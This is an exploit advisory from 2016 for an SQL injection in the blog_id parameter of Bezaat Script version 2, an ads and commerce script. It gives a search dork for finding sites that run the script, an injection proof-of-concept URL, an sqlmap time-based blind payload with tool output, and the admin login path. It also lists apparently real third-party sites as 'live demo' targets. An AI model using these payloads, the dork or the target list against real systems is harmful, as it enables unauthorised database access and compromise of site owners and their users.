Bezaat Script 2 SQL Injection
Posted on 15 September 2016
###################### # Exploit Title : Bezaat Script V2 SQL Injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : Powed by Greenit Egypt for Information Technology # Vendor Homepage : http://greenitegypt.net/products.php?cat_id=1 # Tested on: [ BACKBOX] # MyBlog : http://xbadgirl21.blogspot.com/ # skype:xbadgirl21 # Date: 15/09/2016 # video Proof : https://youtu.be/psHqU3Ldo5Q ###################### # [a] DESCRIPTION : ###################### # [+] Bezaat Script It's An Commerce Script # [+] That Allow you To Add and Menage ads in your Website # [+] AND an SQL Injection has been Detected in his Script Version 2 # [+] The Other Version Maybe Also infected ###################### # [a] Poc : ###################### # When you add ['] to the Vulnerable Parameter you will Notice a Warning With SQL errors # http://127.0.0.1/blog/blog.php?blog_id=[SQLi] # [id] Get Parameter Vulnerable To SQLi # http://127.0.0.1/blog/blog.php?blog_id=1' ###################### # [a] SQLmap PoC: ###################### # Parameter: blog_id (GET) # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: blog_id=1 AND SLEEP(5) #--- #[14:19:45] [INFO] GET parameter 'blog_id' appears to be 'MySQL >= 5.0.12 AND time-based blind' #injectable #[14:19:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' #[14:19:45] [INFO] automatically extending ranges for UNION query injection technique tests as there #is at least one other (potential) technique found #[14:19:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' #[14:19:59] [INFO] checking if the injection point on GET parameter 'blog_id' is a false positive # # GET parameter 'blog_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ###################### # [a] Live Demo : ###################### # http://al3ta.com/blog/blog.php?blog_id=1 # http://192.185.31.144/~greenscr/bezaat/blog/blog.php?blog_id=4 ###################### # [a] Admin Dashboard : ###################### # http://127.0.0.1/admin/adminlogin.php ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################
